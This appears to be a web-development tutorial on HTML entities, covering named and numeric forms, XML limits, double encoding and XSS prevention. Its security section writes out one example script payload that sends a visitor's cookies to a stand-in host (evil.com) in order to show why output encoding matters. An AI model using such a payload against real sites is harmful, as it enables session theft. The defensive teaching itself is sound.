Encoding · 7 min read

HTML Entities: Special Characters in Web Development

Master HTML entities for displaying special characters in web pages. Covers named entities, numeric references, security implications, and common use cases.

You write <p>if a<b then stop</p> in your HTML and the browser reads <b as the start of a tag, swallowing everything up to the next >. You try to display an ampersand in your content and the browser thinks you're starting an entity reference. These are the kinds of problems HTML entities solve, and if you've ever debugged a page where half the content disappeared, you've met them firsthand.

The Problem HTML Entities Solve

HTML uses certain characters as part of its syntax. The angle brackets < and > define tags. The ampersand & starts entity references. The double quote " delimits attribute values. When you want to display these characters as content rather than markup, you need a way to say "I mean the literal character, not the HTML syntax."

HTML entities are that escape mechanism:

&lt;    → <   (less than)
&gt;    → >   (greater than)
&amp;   → &   (ampersand)
&quot;  → "   (double quote)
&apos;  → '   (apostrophe/single quote)

Without them, the browser has no reliable way to tell markup such as <div> from content such as "a<b" that merely contains a less-than sign. The entity &lt; unambiguously means "display a less-than sign here."
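
As a minimal sketch of this escape mechanism, Python's standard-library html module can perform the substitution in both directions. Python is used here only for illustration, and the sample string is made up.

```python
import html

# Sample content that contains all five syntax characters.
raw = "<a href=\"x\">Tom & Jerry's</a>"

# quote=True (the default) also escapes double and single quotes.
encoded = html.escape(raw, quote=True)
print(encoded)

# Decoding reverses the substitution.
assert html.unescape(encoded) == raw
```

Note that html.escape writes the apostrophe as the numeric reference &#x27; rather than &apos;. Both decode to the same character.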

Convert between raw characters and HTML entities with the HTML Entities tool.

Named, Numeric, and Hex Entities

HTML provides three ways to reference the same character:

Named entities use a human-readable name: &copy; for ©, &euro; for €, &mdash; for —. There are about 2,200 named entities defined in the HTML5 specification.

Decimal numeric entities use the Unicode code point in decimal: &#169; for ©, &#8364; for €, &#8212; for —.

Hexadecimal numeric entities use the hex code point: &#xA9; for ©, &#x20AC; for €, &#x2014; for —.

All three produce the same result. Named entities are easier to read in source code. Numeric entities can represent any Unicode character, even those without a named entity.

<!-- All three display: © -->
&copy;
&#169;
&#xA9;

When should you use which? Named entities for common symbols (more readable). Numeric entities when you need a character that doesn't have a named entity, or when you're generating HTML programmatically and want consistency.
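
The relationship between the three forms can be sketched in a few lines of Python. The helper name numeric_forms is hypothetical. The lookup table codepoint2name comes from the standard library and only covers the older HTML 4 names, so treat a missing name there as "not found in this table" rather than "no named entity exists".

```python
import html
from html.entities import codepoint2name

def numeric_forms(ch: str) -> tuple[str, str]:
    """Return the decimal and hexadecimal references for one character."""
    cp = ord(ch)
    return f"&#{cp};", f"&#x{cp:X};"

for ch in ["©", "€", "\u2014"]:  # \u2014 is the em dash
    dec, hexa = numeric_forms(ch)
    name = codepoint2name.get(ord(ch))  # None if the HTML 4 table has no name
    named = f"&{name};" if name else "(no name in this table)"
    # Every form decodes back to the same character.
    assert html.unescape(dec) == html.unescape(hexa) == ch
    print(ch, named, dec, hexa)
```

Generating the numeric form from ord() is the "consistency" option mentioned above: it works for any character without a lookup table.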

Essential Entities Every Developer Needs

Some entities come up so frequently that you should know them without looking them up:

The Big Five (Syntax Characters)

&lt;     <     Required in content to avoid tag interpretation
&gt;     >     Technically optional in most contexts, but use it for clarity
&amp;    &     Required everywhere — even inside attributes
&quot;   "     Required inside double-quoted attributes
&apos;   '     Required inside single-quoted attributes (HTML5)

Typography

&mdash;  —     Em dash (long dash for parenthetical statements)
&ndash;  –     En dash (for ranges: pages 1–10)
&hellip; …     Ellipsis (proper three-dot character)
&lsquo;  ‘     Left single quote (curly)
&rsquo;  ’     Right single quote / apostrophe (curly)
&ldquo;  “     Left double quote (curly)
&rdquo;  ”     Right double quote (curly)

Symbols

&copy;   ©     Copyright
&reg;    ®     Registered trademark
&trade;  ™     Trademark
&euro;   €     Euro sign
&pound;  £     British pound
&yen;    ¥     Japanese yen
&deg;    °     Degree symbol

Spaces and Formatting

&nbsp;         Non-breaking space (prevents line break)
&ensp;         En space (half an em)
&emsp;         Em space (one em wide, equal to the font size)
&thinsp;       Thin space
&shy;          Soft hyphen (breaks only when needed)
&zwj;          Zero-width joiner
&zwnj;         Zero-width non-joiner

&nbsp; is probably the most (ab)used entity in web development. Its real purpose is preventing line breaks between words that should stay together — "100 km" shouldn't break across lines. Using it for visual spacing is an anti-pattern — use CSS margins and padding instead.
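
Because the spacing entities render as nothing visible, it can help to see which characters they actually are. The following sketch decodes each one and prints its code point and Unicode name, using only the Python standard library. The helper name describe is hypothetical.

```python
import html
import unicodedata

SPACING_ENTITIES = ["&nbsp;", "&ensp;", "&emsp;", "&thinsp;", "&shy;", "&zwj;", "&zwnj;"]

def describe(entity: str) -> str:
    """Decode one entity and report its code point and Unicode name."""
    ch = html.unescape(entity)
    return f"{entity:<9} U+{ord(ch):04X}  {unicodedata.name(ch)}"

for entity in SPACING_ENTITIES:
    print(describe(entity))

# A non-breaking space is a different character from an ordinary space.
assert html.unescape("100&nbsp;km") != "100 km"
```

The last line is the practical catch: text containing &nbsp; will not compare equal to text typed with a regular space, which matters for search and string matching.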

HTML Entities and Security

Here's where entities stop being a formatting convenience and become a security requirement. Cross-Site Scripting (XSS) is consistently ranked among the top web vulnerabilities, and failing to encode untrusted output is one of its primary causes.

Consider a search page that displays the user's query:

<p>You searched for: USER_INPUT_HERE</p>

If a user searches for <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>, and you render that without encoding, the browser executes the script. The attacker just stole the user's session cookies.

The fix: encode all user-supplied content before rendering it in HTML:

<!-- Dangerous: raw user input -->
<p>You searched for: <script>alert('xss')</script></p>

<!-- Safe: encoded entities -->
<p>You searched for: &lt;script&gt;alert('xss')&lt;/script&gt;</p>

The encoded version displays the literal text instead of executing it.
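
On the server side, the fix could look roughly like this. It is a sketch only: render_search_heading is a hypothetical helper, and a real application would normally rely on its template engine's auto-encoding instead of building HTML by hand.

```python
import html

def render_search_heading(query: str) -> str:
    """Return the results heading with the user's query safely encoded.

    render_search_heading is a hypothetical helper, not part of any framework.
    """
    return f"<p>You searched for: {html.escape(query)}</p>"

payload = "<script>alert('xss')</script>"
print(render_search_heading(payload))
```

The output contains &lt;script&gt; rather than a real script element, so the browser shows the payload as text.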

⚠️ Most modern web frameworks (React, Vue, Angular, Django, Rails) auto-encode output by default. But if you use "dangerouslySetInnerHTML" in React, {!! !!} in Blade, or "|safe" in Django or Jinja2 templates, you're bypassing that protection. (Jinja2 on its own only auto-encodes when autoescaping is enabled.) Only use raw HTML injection when you've sanitized the content yourself.

Context Matters

HTML entity encoding protects against injection in HTML content and attributes. But it's not sufficient for all contexts:

  • Inside <script> tags: you need JavaScript string escaping, not HTML entities
  • In URLs: use URL encoding (percent-encoding), not HTML entities
  • In CSS: use CSS escape sequences
  • In HTML attributes without quotes: encoding the five syntax characters is not enough, because a space and many other characters can end the value, so always quote your attributes

This is why security frameworks provide context-aware encoding functions rather than a single "encode everything" approach.
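
To make the contexts concrete, here is a rough sketch of three separate encoders built from the Python standard library. The function names are hypothetical, and this is not a substitute for a vetted security library. It only illustrates that each context needs its own escaping rules.

```python
import html
import json
from urllib.parse import quote

def for_html_text(value: str) -> str:
    """Encode for element content or a quoted attribute value."""
    return html.escape(value, quote=True)

def for_url_component(value: str) -> str:
    """Percent-encode for use as a single query-string value."""
    return quote(value, safe="")

def for_js_string(value: str) -> str:
    """Produce a JavaScript string literal for an inline <script> block.

    json.dumps handles quotes and backslashes; "<" is additionally written
    as \\u003c so the value cannot close the surrounding script element.
    """
    return json.dumps(value).replace("<", "\\u003c")

value = "</script> & \"quotes\""
print(for_html_text(value))
print(for_url_component(value))
print(for_js_string(value))
```

The same input produces three different outputs. A URL placed inside an href attribute passes through two contexts, so it would be percent-encoded first and then HTML-encoded.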

HTML Entities in XML and XHTML

XML defines only five built-in entities: &lt;, &gt;, &amp;, &quot;, and &apos;. All those named HTML entities like &copy; and &mdash;? They don't exist in XML unless you define them in a DTD.

This catches people off guard when working with XML documents. You write &copy; in an XML file, the parser throws an error about an undefined entity. The fix: use numeric entities (&#169;) in XML, or define the entities in your DTD.

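XHTML parsed as XML follows the same rule: a named entity resolves only if the document's DTD declares it, so numeric references are the portable choice. HTML5's own parser (which is not an XML parser) supports all named entities natively.

<!-- Valid HTML5; an XML parser rejects it unless a DTD declares &copy; -->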
<p>&copy; 2026</p>

<!-- Valid in both HTML5 and XML -->
<p>&#169; 2026</p>
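
The difference is easy to check with a non-validating XML parser. This sketch uses Python's xml.etree.ElementTree, and parses_as_xml is a hypothetical helper name.

```python
import xml.etree.ElementTree as ET

def parses_as_xml(markup: str) -> bool:
    """Return True if a non-validating XML parser accepts the markup."""
    try:
        ET.fromstring(markup)
        return True
    except ET.ParseError:
        return False

print(parses_as_xml("<p>&copy; 2026</p>"))   # named entity, no DTD
print(parses_as_xml("<p>&#169; 2026</p>"))   # numeric reference
print(parses_as_xml("<p>&amp; &lt; &gt; &quot; &apos;</p>"))  # the built-in five
```

This prints False, True, True: the parser reports &copy; as an undefined entity, while the numeric reference and the five built-in entities are accepted.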

Common Pitfalls

Double Encoding

You encode & to &amp;, then your template engine encodes the output again, turning &amp; into &amp;amp;. The user sees &amp; on the page instead of &.

This happens when you manually encode content that's also being auto-encoded by your framework. The fix: encode at one layer only. If your framework auto-encodes, don't pre-encode.
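
One way to enforce "encode at one layer only" is to mark text that has already been encoded, similar in spirit to the safe-string types some template engines use. The sketch below is an illustration under that assumption. SafeHtml and encode_once are hypothetical names, not a real library API.

```python
import html

class SafeHtml(str):
    """Marker type for text that is already encoded (hypothetical helper)."""

def encode_once(value: str) -> SafeHtml:
    """Encode plain text, but pass already-encoded SafeHtml through unchanged."""
    if isinstance(value, SafeHtml):
        return value
    return SafeHtml(html.escape(value))

raw = "Tom & Jerry"
print(html.escape(html.escape(raw)))   # double encoded
print(encode_once(encode_once(raw)))   # encoded once
```

The first line prints Tom &amp;amp; Jerry, the bug described above. The second prints Tom &amp; Jerry, because the second call recognizes the marker and leaves the text alone.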

Encoding Inside Attributes

Attribute values need entity encoding too, especially for quotes:

<!-- Broken: quote ends the attribute early -->
<input value="He said "hello"">

<!-- Fixed: encoded quotes -->
<input value="He said &quot;hello&quot;">

<!-- Also valid: use single quotes for the attribute -->
<input value='He said "hello"'>
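
When the attribute is generated by code, the encoding step might look like this sketch. input_tag is a hypothetical helper, and the important detail is that quotes are escaped and the attribute is always quoted.

```python
import html

def input_tag(value: str) -> str:
    """Build an <input> element with a double-quoted, encoded value attribute.

    input_tag is a hypothetical helper for illustration.
    """
    return f'<input value="{html.escape(value, quote=True)}">'

print(input_tag('He said "hello"'))
```

This prints <input value="He said &quot;hello&quot;">, matching the fixed markup above.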

Missing Semicolons

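Entity references end with a semicolon. Without it, HTML parsers still recognize a fixed list of legacy names such as &copy, but not newer names such as &mdash, and the rules change again inside attribute values:

&copy    <!-- Works in text for this legacy name, but not for every entity or context. Always add the semicolon -->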
&copy;   <!-- Always works -->

HTML5 has complex rules about semicolon-less entity parsing. Don't rely on them. Always include the semicolon.
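
A quick experiment shows how uneven the semicolon-less behavior is. This sketch uses Python's html.unescape, which follows the HTML5 rules for text content. Browsers apply stricter rules inside attribute values, so treat the output as an illustration of the decoder, not a browser test.

```python
import html

samples = [
    "&copy; 2026",      # well-formed reference
    "&copy 2026",       # legacy name, semicolon omitted
    "&mdash 2026",      # not a legacy name, semicolon omitted
    "?page=1&copy=2",   # query string that was never encoded
]

for text in samples:
    print(f"{text!r:20} -> {html.unescape(text)!r}")
```

The first two samples decode to the copyright sign, the third is left untouched, and the last one silently turns the copy parameter into a symbol. That last case is why raw ampersands in URLs should be written as &amp;.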

Copy-Paste Encoding Issues

When you copy text from a word processor into HTML, you might get "smart quotes" and em dashes that look fine in the browser but cause issues in systems expecting ASCII. If your HTML formatter shows unexpected characters, check for typographic characters (curly quotes, en and em dashes, ellipses) that should be plain ASCII.
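
If the downstream system really does need ASCII, one option is to normalize pasted punctuation before storing it. The mapping below is an illustrative choice rather than an exhaustive list, and to_plain_ascii_punctuation is a hypothetical helper.

```python
# Map common word-processor punctuation to ASCII equivalents.
# The mapping is an illustrative choice, not an exhaustive list.
SMART_TO_ASCII = str.maketrans({
    "\u2018": "'",    # left single quote
    "\u2019": "'",    # right single quote / apostrophe
    "\u201c": '"',    # left double quote
    "\u201d": '"',    # right double quote
    "\u2013": "-",    # en dash
    "\u2014": "--",   # em dash
    "\u2026": "...",  # ellipsis
})

def to_plain_ascii_punctuation(text: str) -> str:
    """Replace typographic punctuation with plain ASCII characters."""
    return text.translate(SMART_TO_ASCII)

pasted = "\u201cIt\u2019s done\u201d \u2014 pages 1\u20135\u2026"
print(to_plain_ascii_punctuation(pasted))
```

This prints "It's done" -- pages 1-5... with only ASCII characters. Whether to flatten typography this way or keep it is an editorial decision. The code only shows the mechanics.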

Entities in Modern Development

In modern web development, you rarely write HTML entities by hand. React, Vue, and other frameworks auto-encode text content. CSS can supply quotation marks for <q> elements through the quotes property. Unicode characters can be used directly in UTF-8 encoded HTML without entities.

So when do you still need entities?

  • CMS content where authors paste from Word or other rich text editors
  • Email HTML where encoding support varies wildly across clients
  • Generated HTML from APIs or databases that might contain unescaped markup
  • Legacy systems that don't support UTF-8 throughout the pipeline
  • Code examples in HTML that need to show literal tags and ampersands
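
For the email and legacy-pipeline cases in this list, a common approach is to emit pure-ASCII HTML in which every non-ASCII character becomes a numeric reference. A minimal sketch, assuming Python and a hypothetical helper named to_ascii_html:

```python
import html

def to_ascii_html(text: str) -> str:
    """Escape syntax characters, then turn non-ASCII characters into numeric references."""
    escaped = html.escape(text, quote=True)
    return escaped.encode("ascii", errors="xmlcharrefreplace").decode("ascii")

print(to_ascii_html("Café & crème: 5 € <each>"))
```

This prints Caf&#233; &amp; cr&#232;me: 5 &#8364; &lt;each&gt;. The result survives any pipeline that can carry ASCII, and a browser or mail client decodes it back to the original text.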

Try It Yourself

The HTML Entities tool converts between raw characters and entities in both directions. All processing happens in your browser. Your content never leaves your machine.
